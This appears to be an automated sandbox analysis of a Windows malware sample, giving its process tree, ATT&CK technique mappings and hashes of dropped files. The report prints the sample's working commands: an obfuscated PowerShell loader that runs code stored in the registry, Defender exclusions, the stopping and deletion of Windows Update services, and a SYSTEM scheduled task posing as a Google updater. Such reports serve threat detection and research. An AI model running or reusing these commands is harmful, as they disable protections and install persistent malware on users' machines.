C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 3680 -ip 3680
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 3680 -ip 3680
1⤵
PID:5460

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:3640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:1940

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:5412

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
1⤵
PID:816

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:5552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
PID:5548

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:5016

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:6152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
PID:2612

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{db1a876a-c97f-46a7-a19c-5a34d101f10a}
1⤵
PID:6684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 3680 -ip 3680
1⤵
PID:3620

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scripting

T1064

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

File and Directory Permissions Modification

T1222

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
74KB

MD5
d846f2ae4b0a9fd2de2d5e20763dca1f

SHA1
6df140e188411a248d694c49a63cba7a17209250

SHA256
23fb34589af890a213d5602bd207fcb052de9e3f7afa3949e7e2f34a6aaa1e6a

SHA512
a1ec3018025fbb94ec15d34afd98910567454a691e02fc314f9643266436d68d986eaa84404cc1b157df5615f3881f3df3ceafa30388d44fb6f5311ce0a62081

Download Submit
C:\ProgramData\WindowsSecurity.exe
Filesize
1KB

MD5
d0560486aba12a1b72aca82814446193

SHA1
dda9103a63327b754026af5143b0cf26d4e2d50a

SHA256
56baf46583957c6e81f8e22bb149363bc2b2c886048b2b0d79aca1896f6c5792

SHA512
8990b3abd05b4b0a144f6ff9e96c829d04374f905e3b513c6b9cd4935a4c2b98d1396d4b14c5d0e127474dbb589f1312958fb646c0a3929e6a300496aebd1754

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
Filesize
717B

MD5
60fe01df86be2e5331b0cdbe86165686

SHA1
2a79f9713c3f192862ff80508062e64e8e0b29bd

SHA256
c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8

SHA512
ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize
192B

MD5
4bee955ec8b78861711fb0d209458c33

SHA1
dedc880afb6824fb48ef2fca854030d9f773d728

SHA256
695ca83eb212d396ba88974d51d95074058877f61db9172bbcbd6072617105ac

SHA512
874eaa26dd576ad18f7396c3721cb9759d91a6bffe88d72a28c920514dd40eaaecd30c24f8d8d514cf4828b230552df5877a5c9d071968e5e4a8b1bcd50cf20f

Download Submit
C:\Users\Admin\AppData\Local\Free MP3 Cutter Joiner\FreeMP3CutterJoiner.exe
Filesize
1.7MB

MD5
443aec41ef427181597fa2f25a6b43c4

SHA1
98cd8ac3774fc3945803b7cea8e68fe37e43ccd3

SHA256
c3c5c61b3ee7482a55cc800298ddbb904e70ba3bbbe36421ab5b820128f0ab6e

SHA512
e7d5b3594cc4ff465124dbbdfc9d187a96e8758bcba26cbdfa43faac83e7c9f78825c6fd79bd720f284003611990dcdc1e02320ff13e4ab520a56d1b94484d62

Download Submit
C:\Users\Admin\AppData\Local\Free MP3 Cutter Joiner\FreeMP3CutterJoiner.exe
Filesize
1.2MB

MD5
ff039eba264ce7c3744dd0793f6ad468

SHA1
75dba066f3ee75d187c5f4d0d22a757e65b63954

SHA256
2c98173b27254e38ff2ea56ad7fcc143fcabe678011de1b106b2b12637d441b6

SHA512
fd37fc3adb347383f37dc8f4077a3e99379d59eaaaf4f28abafac0b6d33d4b58618cb798ad8dde06202e1b41390be652708f3187dbdacc8deb3352a7e84ac6aa

Download Submit
C:\Users\Admin\AppData\Local\Free MP3 Cutter Joiner\FreeMP3CutterJoiner.exe
Filesize
451KB

MD5
85e4f20219877123147245d3b0d4abd0

SHA1
d93176e2e9d0752ae0783899f5ea4bf8e8ddf79d

SHA256
77bd94528808c93435fb5da9f1079317b2f8787fcaf0c2283f1c25da10d85427

SHA512
010a9234c284fe9cd4d3cb114a259aa0805c48d51273a7addd15eec6673b991b0ceab026472773d07495333422a29aeeb0068f76d4e6ca8e2468bf1109dad63e

Download Submit
C:\Users\Admin\AppData\Local\Free MP3 Cutter Joiner\is-7SIF3.tmp
Filesize
1KB

MD5
0742af3d6b1a9dc5bbdfe6d65efda67a

SHA1
778fd310c8346e81e318e5fe1a6a7ef673867b0e

SHA256
c2b114d25ac98200866b8db1a7b73d5daeeadce0769e80a7e39f2ca06eb83012

SHA512
1718e09cb06f964626bf36fea84b45d01fb2c17f177b9f7d26aa80d0c9d86b368002a7fc3d14161e485d039d28d2764d138e85f28c4f7d0a11fd00fc993d960b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
14KB

MD5
92dde35d30b7a716ee411964494335c5

SHA1
c2a1318060615ee6b1d73449b6c1df7671088bf2

SHA256
7eb91816870ad56d39a5bbd596a3f4be120f7e27caf46ec09c83abd118a882ba

SHA512
4c542598a3f9180504c886258337093f1e9a86b0f61a941eb1bd82d472d158b17ef76fa6058656906d8c21fdc8c69368321b6ac8858d9e2476f9314155df9d84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
14KB

MD5
916b3a4edc1bf635037dc16fee0429be

SHA1
71098c1bb5618bdf15c9ebdba204b2cb9db8d359

SHA256
cf4bad9d97d79f68f42ca877266661060395690a5d1f982834fedf7182708edb

SHA512
f6aa7407ca3b58022612b78c735eecd69e95dcf31e993eb6af456829e90fc9ae576f548a111e4a696ba14152a7068a22de7c5193261b35f7d8e66966b8b5d23c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
46be07258b725e1bf96cffe321fc24c5

SHA1
1b4d2672713249c43bc53586c98d8350a82e3ef4

SHA256
a8c358fe0e8a1b6def1f55c1e2caed2329b78cf6b48a9bb6e92797b6416dcd8b

SHA512
0e97b97b56f7dfae214ebc5900f2ff62e78ae79422bb06bd9b4fe7217a120166ba6045d0e4ed9aacbad82816b2afb5fdf9219003a591e8c61a94470e6b54cc26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
826846983f7dcef19a3283bcc1e92030

SHA1
0fcd39fa82d1cfb7de24d41a2756feb61380bd76

SHA256
8a28d8cfd875f23cd8ff8c268f0de0b1060855600ffc406f0d37c7f394babd4c

SHA512
40d9097154d1f69cfdbd79ca9293380849fc7682adbfdd3db4268fd75e08c042b482c4a1bd758c7fda602e744edd4692ca39b2daded6ebd732ff1adfbbcbef3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
da255d6e827f6f566661652c5f08620e

SHA1
27a36eb35d67c0ef70bf71d5be1a989641808d65

SHA256
a3b85d0066eeb4d7f0ce0c48eacbb922d6b48fd108c611f7cd05835fc0acc956

SHA512
7aa629b4929885cf5c42bc1d280083dbd31ccac6425f6757cfce07dbbe4ad33a85fff1d4f8907505dc13f710d4308ee06d1fbc77e365b6b0392c8328b2fc99d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
6f9d41d367f8d4f968a32f7daeea27dd

SHA1
f9512c484027bb94e43417b0e0292618d4b8e3cf

SHA256
4c4a7e4fdd7a22f3d9758f8e31e329584b4f69db2a3a715f5916b6b4b77b061f

SHA512
e801d47f473a033451c77ccf1b64684d4ccd5620f79e0267edea1b172abb326b6846c87ff4d29307dcffadadf7acf5ac35f17006c7aee1f71661f8d38b4756cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus
Filesize
84KB

MD5
a90d969be1526bde0d7182c8b633ac7e

SHA1
0b18eae34b68b744e84de2f02eb57cd06b08485d

SHA256
7f847b962a11f67ba09c6e2e7828d1b9073d6573a64c987aa8ab39d5ac224cb0

SHA512
50eae57eae082d2b9cd4fa0d42062d237d0dd1a43b3980aec9dcc06dce67cac68a7f9fd5de794b035fa4927edb30bce6227dcdf9c0c21d026f756827488010ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new
Filesize
126KB

MD5
04e05f77b0af2d249117dc0a96ecd376

SHA1
2cabfb3161c1dbdeba0f792955370ab9401ddc61

SHA256
e23c73f7aab8470ac47bf0ef6fde89e733ac02eae29af9d96fcebd54dd209569

SHA512
60345a37b5db391693ba815a57039869b83ae62d55dce0fa841d96fb39df70c7b73a390e9b3bef4be35dd9a9e43675251c3e4d32705dd45e74981a29a22fdd5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7b0d48dbbf50fe239f1097f5d01c2a6d.exe
Filesize
391KB

MD5
8427cdd333ae1cb0244c698191a82d7d

SHA1
196c5ccb757168bbed5568fba47c58fdce4436ec

SHA256
7728852e643f55d465b758ec262ad05e72053daef8aec3efb29887f24a6a405b

SHA512
c95e9a46ad475811e899a2e84780a7f44b094e650116d49bf0ff94a47ce751dcc250144ae9c5758fed460c049523f441be60ba30f5134f111ac90905ca994229

Download Submit
C:\Users\Admin\AppData\Local\Temp\7b0d48dbbf50fe239f1097f5d01c2a6d.exe
Filesize
430KB

MD5
50447e6f850727733764c081cfa17057

SHA1
2d401da9bb407a99b2da6a74ad47bde874254b3f

SHA256
bd24215708ca11fe3012181af31b47e5607b8bd3291277afc649a80707a87972

SHA512
38da88112f84df3bb390a040d12722b1559136f0ccfa46509a2d87565b9dd8ab8b99163002475f779eed75497f8354df7270ba39df0f19773a78a6c78394c75c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7b0d48dbbf50fe239f1097f5d01c2a6d.exe
Filesize
354KB

MD5
04edc06098e3d904c5bdd4feb809c695

SHA1
8d92a898cf38a30f272e997bca54987424fe6488

SHA256
2e75b01902d4b87a3dd1970ddf6a52287cbf79c51c629268974ef17f8fa78df3

SHA512
2df581d95492f8178829d7f12dec76849654f6548a69e2de2895b97e38501e690718faf1e7969edfaa397b72819e3a57676c7eabefcee6d1cfeb46938c03bb50

Download Submit
C:\Users\Admin\AppData\Local\Temp\7b0d48dbbf50fe239f1097f5d01c2a6d.exe
Filesize
144KB

MD5
e822d0d1487fda673406a2aff0f3f4f4

SHA1
abc3fac99f04b5749ef1e1d78b7f1f1a1ae2a6fc

SHA256
0ee075918ed32b539d1929a9cfdac0d24dc78f75044d2f5b2d7a56daa37aedeb

SHA512
784a24a76924f0e94f60eea6ac8e6d32162f450210d6c3e6b9e073c98fd87490d30d70121dea057d1940816cafdd2ec45eb48a13c66380b451142d6819762f7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\FE8406.tmp
Filesize
127B

MD5
1d646d8d56c73c909d3bab6f58156ae4

SHA1
17a163a2f475dae7a2e047ede69740d746fae915

SHA256
51f1cacc7886c3a529837523c2eb5c1e98cfc08c14336e5d67bbd4ef21e84202

SHA512
583ce435406f5b4020642a301bbc638465320f1a0c72eafe2fb45477096504085d75942b881e06766737678e8e7a78acfdf1f09e66b01fadc680765838ddbdd4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\1230.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe
Filesize
95KB

MD5
912bf299fd0992da02e0ec7ae128bfae

SHA1
8700ce469282763c4aad3d1213e9e2ed851b2e07

SHA256
cdf9bb9549041fb2248668dd0e424167ba775e76e91296514274cbfa35acf7d8

SHA512
1497b35d603654ee7fd0a36ba8b23da45cb1b6abe9cae7694eba6f43e41b8836d75151778552338b25a93ab0769c8c997369ed76cdbd668e4837df3fa0617940

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe
Filesize
124KB

MD5
5e0372875062e779ecd5e4a2be948526

SHA1
adc493758a1743f3845bfbd438f076706ae1fc5f

SHA256
d3ad3e1ba6c3fced3ee7fefc8588b2a1100f61c5c6b8e12eff6fe21b8d5ae13b

SHA512
b2a22d5e1f5bce857dc7c06571e599e81334a58b7bfa31b4c8f31239c5a8f150e4ca4f0029c418f84e02b419e23f7943090b6cf88f4d03fdf54eb44180fdda4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\15c63318bd5a529e599e5d60302f2dc14961ebcc209b735796efbfdb4c1d59fd.exe
Filesize
67KB

MD5
72b04913699911051c7d202e8db9c8da

SHA1
8657866ee9c1617026de22792e66d26f2e5ea03d

SHA256
72644fb03e67245b85a1d5c56f395603dbf3069e169f166fff8f45b72cefb5a7

SHA512
9507cb5e75df5e13d188e07b42d88badea5d4dcb732135b38d5899e459a9c067901500361e2c4b4bcc2d15b4eaf5eac0ce0e246d0531a5f7c284f2d4e0e5f1cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\1bz7KfahvU.exe
Filesize
130KB

MD5
f5137524e669a409831d9dd447c35504

SHA1
511648e2ee36071d3a949b1b76c4574cd7dbb29c

SHA256
6e2633acd1f894272b1785659303424dc785105c73a82b568df0ddf5ca725fa9

SHA512
12e795120878cd88f5c894cf63f0d434beec07123501286b216583607e5b5b861586bb344b965d02d6746aca4a6bdf364022be87c85add45de30cd3c3d6cfd19

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\1bz7KfahvU.exe
Filesize
76KB

MD5
8f9db2a5a7f5bfe309c51ec35176bf64

SHA1
aab74367aa187c71c3945a04e9d1b85e4ddaf502

SHA256
2cfa07276beb4042fe873aeec5d17a47f62fbc99e971587743cdc5610dfde5b8

SHA512
bed8b2532bf56ca326eb64b5eba0b542d1b926c1270db53396162f76b19b489119d7e21a1e1e12e6822303f5bcaec3a9473f2b082790ec835b17f854e4bc7c1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\1bz7KfahvU.exe
Filesize
18KB

MD5
07c60936a58ea89b201982815f64075a

SHA1
dd3670b7d245654ba82680f39a4489592fb03aff

SHA256
a8fa9c8f5d8dab80fcdba3e71951b2dd594f8e79cce66333934b9360180c416a

SHA512
317fa9ca0536e321faea0afe28857439904a17bae5c7302422a08bce03c98717bea139647dbccdb1172c29123b09124c22d2f2d83ea1c865ad14658b47155330

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\9.exe
Filesize
20KB

MD5
4074af3d86e1b46265e149db0288721b

SHA1
50dc4db18276b8a70e289722477834977006f8a0

SHA256
665ab69b29b1af8d2dfaf37cf94b355e4e50ce981f77b6559bb33143f6d31cb4

SHA512
03082c35cdc078f9bcd11ad322798a960f2e596be5dd20d6d004a9db952bfca3a36d05860707131bc20fec5ee42aec10bf85147ea80ca9550ba8775fc950b350

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\987123.exe
Filesize
176KB

MD5
b70acbcf09afc11640e41183b78e252f

SHA1
539f14d2c400cf44ff8b247e2067a70156bf3353

SHA256
7b72bd47a94dad14590c938216e2149d9fa844dcb629f1878b438703eebe2793

SHA512
9681ba303da6e6deac279843b8aacdf27f3120a30063bd12c3203e204f4416ce684bd1be0d0467636d7535fc7b314d5a515be2b8a7ec61acbfdba655c17f2556

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\987123.exe
Filesize
100KB

MD5
c5c62923f8434a7542f18e4e976f12ce

SHA1
6d46606915d4166b16539305187e9bb5199c025c

SHA256
e0a6277066a9406ffda69f46485d782775c4352f4a52cb15e6d108a0f9c937f0

SHA512
7a5df2d107a69ed7998e3ee222ce931b770a435264555fe15bf3c40996173d7f5d49a724a4d7413a028f31ca5d7199010aa324358c85cda41eeee432c13ffbb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\987123.exe
Filesize
134KB

MD5
feb19414fa6c7ac19999d6d34b053444

SHA1
dfeb5b3b2f5603df75bb0b3fe0bfb0b1d816dd05

SHA256
584e0ab2655e924149dcc512f640c2a7652f163fb20eb650722b8d9826e88d52

SHA512
ffcefe20f073339934b9edac63f5abca2dbe2402f228801062c9a917cfca76b1a293c51d45d35b127ac3b96fbc8c0e0a81222bc815bde3cdeb636ac11ca8239a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Amdau.exe
Filesize
1KB

MD5
4b654a62e98a6d7e93d7a8cd6b04ff65

SHA1
bfcac23b7f92512f1a804131561c871aea5c0848

SHA256
4d1f351748b847863756895b19abcb042e402b9f11c4a17da0b6d5f4ed4cef26

SHA512
109817d25e0eac1dae3ee9b428dfa51833fae9cbc13f73ea38ba1fdf57f03d024f68422b647c542d5dba79dceb5fa823ef1d4ba5d66c80c24fc54d3b84dde43f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Atqumy.exe
Filesize
9KB

MD5
74b58b6cd7d95650fbbd021c81a230bd

SHA1
2f99f05699eab186fba48416b339db574edc3416

SHA256
cc27aa51592df57fc6a9c8aea7cc227353a72e52ad3fb6c1bf1454421c738f67

SHA512
b9794e41410eff7c2dd098198ea61d22e82bbfaaac21eed38272f55b8a4a866f9ceee75d31d93a9e087e48ed5a9d0d3741db8d1be4867d56e65b922337359baf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe
Filesize
378KB

MD5
429229a04ef73e455fc976011c3adaf3

SHA1
9e303187caaa87a05de726c8d0ac1ee6838b24e0

SHA256
4abc3992b258f366d04c549a2c866c2c81e543601c6d791476ebf5f901889116

SHA512
662b1eb64e2e667a79e2e9514c2bb9ee42b93b888c8b8d2e32b111f0039b6c999307c69f6da2aa375085286e6a7fdb2861f0d6d0b69f0586909cc7b9334f682b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe
Filesize
394KB

MD5
43774e930d2f3bacde1219e4d13ac771

SHA1
eddfcf05f6433518ffa5bab195f0ed92e6b5767b

SHA256
06567742ad7eb541f75425321a64613beeef7657f5522a1319244e51db49b6d4

SHA512
7d7a7e6566f017a5cf3f38cfd9347734f79dadd67e2952d0308212744a8915ec0ffca41682456c97cd1e89a324a0fc5b975333c9fce8a97567a01c378edf4527

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Aztec.exe
Filesize
11KB

MD5
a97950a4c4a3b3665e00d5c950a760f8

SHA1
1d7e8131aa337ef25d3208aad5ef8a92e0849a49

SHA256
b029a634e85fdba1ef4612ed90f6ebbf771bed54f844a5cf02e10d14b35093b7

SHA512
a9e520b56fb235db125357bebfadcff641dd7b4f6afe60c5e13e11c6140d8f135af9f7fdc8d16b48c6ec377bfd78574d6ded7b5ded1c1b7fa6a6aeb8107780e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Cheat.exe
Filesize
3.0MB

MD5
07563b717c0a82ee27ead5e8074b81dc

SHA1
296e75dba27ca283c8ab167b6d51630421140d05

SHA256
47e8397c8b9ba6bab376c96930b83f49acb023bbffa19c331df0de6ced6092ed

SHA512
f45f9ccf94cfb41f221e73e192d24f3f4126af7752c5f4674d7aa851dd9e0a06a4d95fc2aefea51b7eaa34188b70ee6e169c07ad4e2d05103b198fcc132f872a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Kcqqn.exe
Filesize
94KB

MD5
c7339f2d8d67dc707dc6a3f59cc06315

SHA1
84109e31bb34b8efe052c893f7e5c1ef5d6a6281

SHA256
a105272e420e2e572acfcd90afa66392a0e85ca64e5c516ddaa8bfa09661b907

SHA512
a0d1e38dc9a7dd7cd1ca986a6b175d2c47bde2fd8ced899b914e7fba84f8f19643bf7d3e202ef9fb63cf4a5d894c07d15749dd0ce31c8b432a6f19099eac6669

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Project_8.exe
Filesize
298KB

MD5
5068ffd5bbcdc63ca867416a7dd5ebc6

SHA1
838a76c07efeb9d372c836073c1f3bf1bc1f9a85

SHA256
f2396d2c676d9c32b1f7217aba861a611e6c63a4b8815f8726dab34aeef9f089

SHA512
5c6f9625a63247d2816e440f5a9b33ce7402e3bf07634e0b0f36c042656b292584fcd76141fae86286c68372fed7ec5e543dc75f4c14bbc09d24aa8986c89234

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Screensaver.exe
Filesize
72KB

MD5
19641940c87adf2e125b5b85f8d242a7

SHA1
dd76a18cc6826b3a4a64eedca2dc9026714a3d9e

SHA256
6eadbbb4368eb760df9ccec6ea44a3d6b63c05f224738dc0e7c06db528ba85f8

SHA512
e498e110e84db19e0277401d833080931439c1f846bbb8297c93c0bbb25f6f74146994af67a96a4abcdd42d9a62145c8ebff9b7ddf9a9bb3d1ab156a6a9600c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Screensaver.exe
Filesize
37KB

MD5
eba5bd81af3e428e1bb31b876094b3db

SHA1
090ff99d5d18da987cfbcf5dc3345f4e0b4bc126

SHA256
6506d404e66528b24f6600579c15670716009ffdafd97ca10b95681bf9384bc8

SHA512
ff3cffe315d2f96e47b71110881616963e2d81605d1fbdecef28c460bdae6627e0ec6ec7ff208320820501331bbbc8e9bbf8a9267a8c2edfb8456711ed559c39

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\WILD_PRIDE.exe
Filesize
211KB

MD5
d524fda613a74690f3c22dd6adb7c2e7

SHA1
3bce73a77c532671099c7b3e93e54f90f4fa033a

SHA256
9da643d448fd0f392833e2051040c6d72925242c48b5761fd84a431dd565e828

SHA512
b21c1af13277105ea7e0cf774d850d7e454da2cbb376ffc140363e0034379fa4b4ba67c3045416a5a34bc76500478f755fb986ab0971d9ba62aba1abef1341c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\adm_atu.exe
Filesize
2.2MB

MD5
3bf5df9947427a4b3faddb051b341d5d

SHA1
2769d534a03d6297c90987da25c53c0f52bf9662

SHA256
d700803c790052b264592c500ea3161db116ed2745582af97f06f6b515619b32

SHA512
c9b28b1bfe23d3b7c15a402200e131fdb9ceaf0db2550bfa964a1b55d7aae161a1815a914b940f4c2dc5b07c65f2cd5094db7caa91ca57cb050bddd848a3b672

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\build1234.exe
Filesize
124KB

MD5
835241c48301a5dc36f99cf457841941

SHA1
a7e4ca83dd2f310a5d8eed4f2bf77ed16922c36f

SHA256
94048358360fd46766cdf1d4f487c1c61a391f97ebc10704c388170ae4e66b88

SHA512
adeee610e4285a58c139a01cd8de518776b6bd006698170ccd3f26a034ea69ec5fed089516ddb482af66aac3bb1936724b72c7a6667f2d35b5f5a01b99dedc7e

Download Submit
